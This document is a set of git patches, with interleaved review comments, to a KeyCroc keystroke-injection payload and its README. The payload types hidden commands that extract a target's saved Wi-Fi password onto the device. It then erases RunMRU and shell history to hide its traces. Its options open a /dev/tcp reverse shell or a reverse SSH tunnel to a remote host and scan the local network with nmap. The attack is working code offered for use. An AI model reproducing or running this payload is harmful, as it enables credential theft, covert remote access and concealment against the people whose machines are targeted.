From 691ec577f4f8733bf6b5c2fa1523c47af68899d4 Mon Sep 17 00:00:00 2001 From: spywill Date: Wed, 19 Jul 2023 05:59:08 -0400 Subject: [PATCH 1/9] Update README.md update for new options --- .../credentials/Croc_Getonline/README.md | 99 ++++++++++++++----- 1 file changed, 77 insertions(+), 22 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/README.md b/payloads/library/credentials/Croc_Getonline/README.md index 17db8c2..5650908 100644 --- a/payloads/library/credentials/Croc_Getonline/README.md +++ b/payloads/library/credentials/Croc_Getonline/README.md @@ -1,8 +1,9 @@ # Croc_Getonline ## INTRODUCTION : - - This project is developed for the HAK5 KeyCroc - - Attempt to connect Keycroc automatically to target wifi access point. + - This project is developed for the HAK5 KeyCroc. + - Attempt to connect Keycroc automatically to target wifi access point. OPTIONS Nmap, Iw, and Curl to gather essential network information and/or start Reverse SSH tunnel. + - Payload will use KeyCroc MATCH command to perform specific tasks. * **TESTED ON** - Windows 10 
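Review bot: the new second bullet in the INTRODUCTION hunk is a sentence fragment: "OPTIONS Nmap, Iw, and Curl to gather essential network information and/or start Reverse SSH tunnel." has no verb. Something like "Optional recon uses nmap, iw and curl to gather basic network information, and an option can start a reverse SSH tunnel." reads cleanly and spells the tools as they appear on the command line. "Keycroc" and "KeyCroc" are also both used in this hunk; the README should settle on one spelling.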
@@ -12,29 +13,83 @@ ## INSTALLATION : - Enter arming mode on your keycroc to install file. - - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder** + - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**. -## STARTING GETONLINE : +## STARTING CROC_GETONLINE : - - After install plug into target and type in anywhere - - **getonline_W** <-- MATCH word for windows - - **getonline_L** <-- MATCH word for Linux - - **getonline_R** <-- MATCH word for Raspberry pi - - When the payload is done running the LED will light up green - - Keycroc should now be connected to target wifi access point - - NOTE: for linux edit payload for passwd needed for sudo permission +After install plug into target and type in anywhere: + - **`getonline_W`** MATCH word for windows, Attempt connection to wifi access point + - **`getonline_L`** MATCH word for Linux, Attempt connection to wifi access point + - **`getonline_R`** MATCH word for Raspberry pi, Attempt connection to wifi access point + - **`getonline_N`** MATCH word for connecting to known SSID ( EDIT PAYLOAD ) + - **`getonline_F`** MATCH word for reset wlan0 interface to last known SSID + - **`getonline_K`** MATCH word for killing keycroc wlan0 interface + - **`getonline_S`** MATCH word for entering ATTACKMODE HID STORAGE + - **`getonline_H`** MATCH word for entering ATTACKMODE HID + - **`getonline_P`** MATCH word for entering ATTACKMODE HID SERIAL + - **`getonline_A`** MATCH word for entering ATTACKMODE HID AUTO_ETHERNET + - **`getonline_X`** MATCH word for Remove Croc_Getonline payload, contents and reboot + +* **LED STATUS** + - **`LED WHITE`** Entering ATTACKMODE + - **`LED ATTACK`** Retrieving wifi access point credentials + - **`LED SETUP`** Configuring keycroc wlan0 interface to wifi access point + - **`LED GREEN`** Successful connection to wifi access point + - **`LED RED`** Payload failed + - **`LED CYAN`** Performing recon scan + +**NOTE:** for linux edit 
payload for password needed for sudo permission. + +## PAYLOAD OPTIONS : + +Editing payload variable options: +- **`option=0`** + +This option will run payload as normal, attempt to connect Keycroc to wifi access point. + +- **`option=1`** + +This option will run payload as normal, after a successful connection open terminal on target and start ssh session. + +( EDIT PAYLOAD FOR KEYCROC PASSWORD ) + +- **`option=2`** + +This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH. + +( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" ) + +SSHPASS is a requirement for this option, payload will attempt to install if not installed. + +- **`option=3`** + +This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. + +( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) + +* **RECON SCAN OPTION** + +The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl. + +- **`recon=off`** + + - Suppresses active reconnaissance to maintain stealth. + - Useful for discreet scanning in sensitive environments. + +- **`recon=on`** + + - Initiates basic network reconnaissance scans. + - Utilizes Nmap, Iw, and Curl to gather essential network information and save to /root/udisk/tools/Target_SSID.txt. ## PAYLOAD INFO : -**PowerShell script that performs the following actions:** +- **PowerShell script that performs the following actions:** Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet. Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet. 
+Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT and exits the script. -Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT. -Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script. - -**Bash script that performs the following actions:** +- **Bash script that performs the following actions:** Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc. Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID. @@ -42,7 +97,7 @@ Gets the password for the current wireless network by searching for the SSID in Writes the SSID and password to a file located at $MOUNT_POINT using tee. Unmounts the volume at $MOUNT_POINT using umount, and exits the script. -**Bash script that performs the following actions:** +- **Bash script that performs the following actions:** Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb. Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist. 
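Review bot: in the STARTING CROC_GETONLINE list the `getonline_N` entry says only "( EDIT PAYLOAD )", while the option entries name the variables to edit; name `known_ssid` and `known_ssid_password` there, and in the option=2 entry also name `port` (7000 in the payload), because the "ssh root@localhost -p port#" command run on the remote host has to use the same value. The option=1 and option=2 entries should also state that `keycroc_password` and `remote_host_password` are stored in clear text in the payload file, which lives on the udisk volume the target sees during ATTACKMODE HID STORAGE.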
@@ -54,24 +109,24 @@ Unmounts the volume at $MOUNT_POINT using umount, and exits the script. Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc". -**-Sed command that performs the following actions:** +- **Sed command that performs the following actions:** By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus: -1{x;s#^#sed -n 1p wifipass.txt#e;x} +- 1{x;s#^#sed -n 1p wifipass.txt#e;x} -1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s +1{..} executes the commands between the ellipses on the first line of wifipass.txt. Commands are separated by ;'s x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space. s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only. x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space. -10{G;s/\n(\S+).*/ \1/} +- 10{G;s/\n(\S+).*/ \1/} 10{..} executes the commands between the ellipses on the tenth line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column. 
-11{G;s/\n\S+//} +- 11{G;s/\n\S+//} 11{..} executes the commands between the ellipses on the eleventh line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. From ec819336d7edb9139ac7cf24e558b70e363ad531 Mon Sep 17 00:00:00 2001 From: spywill Date: Wed, 19 Jul 2023 06:02:58 -0400 Subject: [PATCH 2/9] Update Croc_getonline.txt minor changes new options recon, ssh keycroc MATCH command perform specific tasks --- .../Croc_Getonline/Croc_getonline.txt | 412 ++++++++++++++---- 1 file changed, 329 insertions(+), 83 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt index 64009c0..64f18cf 100644 --- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt +++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt 
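Review bot: the change from "first line of config.txt" to "first line of wifipass.txt" in the sed explanation (hunk @@ -54,24 +109,24 @@ of PATCH 1/9) is incorrect: the address `1` in `1{x;s#^#sed -n 1p wifipass.txt#e;x}` selects line 1 of the file the outer `sed -i` edits, which is config.txt; only the inner `sed -n 1p wifipass.txt` reads wifipass.txt. The `10{..}` and `11{..}` paragraphs that follow still say config.txt, so this line should keep config.txt as well. The same hunk turns the three sed command lines into `- ` bullets; since they are commands, wrap them in backticks the way the README already does for the MATCH words instead of making them list items.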
@@ -1,118 +1,364 @@ # Title: Croc_Getonline # Description: Attempt to connect Keycroc automatically to target wifi access point -# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt +# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 3.5 +# Version: 4.1 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro -MATCH (getonline_W|getonline_R|getonline_L) +# getonline_W <-- MATCH word for windows, Attempt connection to access point +# getonline_L <-- MATCH word for Linux, Attempt connection to access point +# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point +# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD ) +# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID +# getonline_K <-- MATCH word for killing keycroc wlan0 interface +# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE +# getonline_H <-- MATCH word for entering ATTACKMODE HID +# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL +# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET +# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot -CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) -for dir in "${CROC_POT_DIR[@]}"; do [[ ! 
-d "$dir" ]] && mkdir "$dir" || LED B; done +MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) +QUACK LOCK -wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt +#---> Edit payload option below +option=0 +keycroc_password=hak5croc +wifi_pass=/tools/wifipass.txt -if [ -f $wifi_pass ]; then - cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt - rm -f $wifi_pass +#---> Edit remote host below +remote_user_name=EDIT_REMOTE_USERNAME_HERE +remote_host_ip=EDIT_REMOTE_HOST_IP_HERE +remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE +port=7000 + +#---> Edit known SSID and password below +known_ssid=EDIT_KNOWN_SSID_HERE +known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE + +#---> Edit recon scan on/off below +recon=off +recon_loot=/root/udisk/tools/Target_SSID.txt + +#---> Edit Linux target password below +if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then + target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) +else + target_password=ENTER_LINUX_PASSWORD_HERE fi -ATTACKMODE HID STORAGE -Q DELAY 5000 -LED ATTACK +recon_scan() { + if [ "$recon" = "on" ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi + elif [ "$recon" = "off" ]; then + : + else + : + fi +} + +ENTER_STORAGE() { + if [ -f ~/udisk$wifi_pass ]; then + cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt + rm -f ~/udisk$wifi_pass + fi + ATTACKMODE HID STORAGE + QUACK DELAY 5000 + LED ATTACK +} + +RESET_PAYLOAD() { + QUACK UNLOCK + sleep 5 ; LED OFF + killall -9 bash + killall -9 python + sleep 1 + RELOAD_PAYLOADS +} + +CLEAN_UP() { + if [ "$LOOT" = "getonline_W" ]; 
then + QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "history -c ; rm -f ~/.bash_history" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi +} case $LOOT in getonline_W) - Q GUI r - Q DELAY 3000 - Q STRING "powershell -NoP -NonI -W Hidden" - Q ENTER - Q DELAY 5000 - Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" - Q ENTER - Q DELAY 3000 - Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" - Q ENTER - Q DELAY 2000 - Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" - Q ENTER - Q DELAY 2000 - Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" - Q ENTER - Q DELAY 5000 - Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK GUI r + QUACK DELAY 3000 + QUACK STRING "powershell -NoP -NonI -W Hidden" + QUACK ENTER + QUACK DELAY 5000 + QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" + QUACK ENTER + QUACK DELAY 3000 + QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | 
Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\"" + QUACK ENTER + QUACK DELAY 5000 + recon_scan + CLEAN_UP + QUACK STRING "exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_R) - Q CONTROL-ALT-d - Q CONTROL-ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "umount \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_L) - if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then - PC_PW=$(sed '$!d' 
/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$target_password" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "sudo umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID +;; + getonline_N) + LED B + sleep 2 + echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass +;; + getonline_F) + if [ -f ~/udisk$wifi_pass ]; then + LED B + sleep 2 else - PC_PW=LINUX + LED R + RESET_PAYLOAD fi - Q CONTROL-ALT-d - Q ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" - Q ENTER - Q DELAY 2000 - Q STRING "$PC_PW" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "sudo umount \$MOUNT_POINT ; exit" - Q ENTER +;; + getonline_K) + ifconfig wlan0 down + LED R + RESET_PAYLOAD +;; + getonline_S) + ATTACKMODE HID STORAGE + RESET_PAYLOAD +;; + getonline_H) + ATTACKMODE HID + RESET_PAYLOAD +;; + getonline_P) + ATTACKMODE HID SERIAL + RESET_PAYLOAD +;; + getonline_A) + ATTACKMODE HID 
AUTO_ETHERNET + RESET_PAYLOAD +;; + getonline_X) + LED R + rm -f /root/udisk/payloads/Croc_getonline.txt + rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt + rm -f $recon_loot root/udisk/config.txt + apt -y remove sshpass + reboot --force ;; esac - -ATTACKMODE HID sleep 3 -LED SETUP -kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) +word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w) +if [[ $word_count -eq 2 ]]; then + ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)" + matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')" + sleep 1 + if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then + LED SETUP + else + LED R + RESET_PAYLOAD + fi +else + LED R + RESET_PAYLOAD +fi + +kill -9 $(pidof wpa_supplicant) +kill -9 $(pidof dhclient) ifconfig wlan0 down if [ "$LOOT" = "getonline_W" ]; then - sed -i '0,/./s/^.//' $wifi_pass - sed -i 's/\r//g' $wifi_pass + sed -i '0,/./s/^.//' ~/udisk$wifi_pass + sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass + sed -i 's/\r//g' ~/udisk$wifi_pass fi -sed -i 's/\( \)*/\1/g' $wifi_pass -sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt -sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt -wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf +sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass +sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt +sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt +wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf + ifconfig wlan0 up -wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 +wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf 
+dhclient wlan0 sleep 3 systemctl restart ssh.service -[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R +if : >/dev/tcp/8.8.8.8/53; then + if [ $option -eq 0 ]; then + : + elif [ $option -eq 1 ]; then + case "$LOOT" in + getonline_W) + QUACK GUI m + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 5000 + ;; + getonline_R) + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + ;; + getonline_L) + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + ;; + esac + QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$keycroc_password" + QUACK ENTER + elif [ $option -eq 2 ]; then + status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" + if [ ! $? = 0 ] || [ ! "$status" = installed ]; then + apt -y install sshpass + else + : + fi + sleep 1 + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null + rm -rf ~/.ssh 2>/dev/null + ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa + sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + sleep 1 + ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip + else + LED R + sleep 1 + fi + elif [ $option -eq 3 ]; then + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + /bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 & + else + LED R + sleep 1 + fi + else + LED FINISH + fi + LED FINISH +else + LED R +fi + sleep 3 LED OFF +QUACK UNLOCK + +if [ "$recon" = "on" ]; then + LED C SLOW + echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot + ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass) + iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model 
Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot + echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot + ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot + cat /etc/resolv.conf | grep nameserver >> $recon_loot + + echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot + calculate_network_range() { + ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" + IFS=. read -r m1 m2 m3 m4 <<< "$netmask" + network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" + echo "$network_range" + } + perform_nmap_scan() { + local network_range=$1 + nmap -T4 -F $network_range >> $recon_loot + } + network_range=$(calculate_network_range) + perform_nmap_scan $network_range + + echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot + curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot + echo -ne "\n\n" >> $recon_loot + LED OFF +elif [ "$recon" = "off" ]; then + : +else + : +fi From 55053ddffb8a46ab7bab22ad4c54a866402f944f Mon Sep 17 00:00:00 2001 From: spywill Date: Sat, 22 Jul 2023 08:43:41 -0400 Subject: [PATCH 3/9] Update README.md minor changes --- .../credentials/Croc_Getonline/README.md | 39 ++++++++++++------- 1 file changed, 25 insertions(+), 14 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/README.md b/payloads/library/credentials/Croc_Getonline/README.md index 5650908..4382462 100644 --- a/payloads/library/credentials/Croc_Getonline/README.md 
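Review bot: in the SSID check after `esac` in PATCH 2/9, `if [[ "$ssid_to_match" =~ "$matched_ssid" ]]` is always true when the scan finds nothing, because `matched_ssid` is then empty and every string matches an empty pattern, so the `LED R` / `RESET_PAYLOAD` branch for a missing SSID is never taken; test `[ -n "$matched_ssid" ]` first, or compare with `=` in the other direction. Two more points in the same hunk: the `sed -i -E -e '1{x;...}' root/udisk/config.txt` line and `rm -f $recon_loot root/udisk/config.txt` in `getonline_X` still use the relative path `root/udisk/config.txt` although the line just above was changed to `~/udisk/config.txt`, so they only work when the current directory is `/`; and `RESET_PAYLOAD` runs `killall -9 bash` before `sleep 1` and `RELOAD_PAYLOADS`, so if this payload itself runs under bash the kill ends the script before the reload is reached, which is worth confirming on the device.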
+++ b/payloads/library/credentials/Croc_Getonline/README.md @@ -29,6 +29,7 @@ After install plug into target and type in anywhere: - **`getonline_P`** MATCH word for entering ATTACKMODE HID SERIAL - **`getonline_A`** MATCH word for entering ATTACKMODE HID AUTO_ETHERNET - **`getonline_X`** MATCH word for Remove Croc_Getonline payload, contents and reboot + - **`getonline_T`** MATCH word for Stopping ICMP/PORT alert * **LED STATUS** - **`LED WHITE`** Entering ATTACKMODE @@ -37,6 +38,7 @@ After install plug into target and type in anywhere: - **`LED GREEN`** Successful connection to wifi access point - **`LED RED`** Payload failed - **`LED CYAN`** Performing recon scan + - **`LED RED FLASH`** ICMP/PORT alert **NOTE:** for linux edit payload for password needed for sudo permission. 
@@ -45,29 +47,25 @@ After install plug into target and type in anywhere: Editing payload variable options: - **`option=0`** -This option will run payload as normal, attempt to connect Keycroc to wifi access point. + - This option will run payload as normal, attempt to connect Keycroc to wifi access point. - **`option=1`** -This option will run payload as normal, after a successful connection open terminal on target and start ssh session. - -( EDIT PAYLOAD FOR KEYCROC PASSWORD ) + - This option will run payload as normal, after a successful connection open terminal on target and start ssh session. + - ( EDIT PAYLOAD FOR KEYCROC PASSWORD ) - **`option=2`** -This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH. - -( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" ) - -SSHPASS is a requirement for this option, payload will attempt to install if not installed. + - This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH. + - ( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" ) + - SSHPASS is a requirement for this option, payload will attempt to install if not installed. - **`option=3`** -This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. + - This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. 
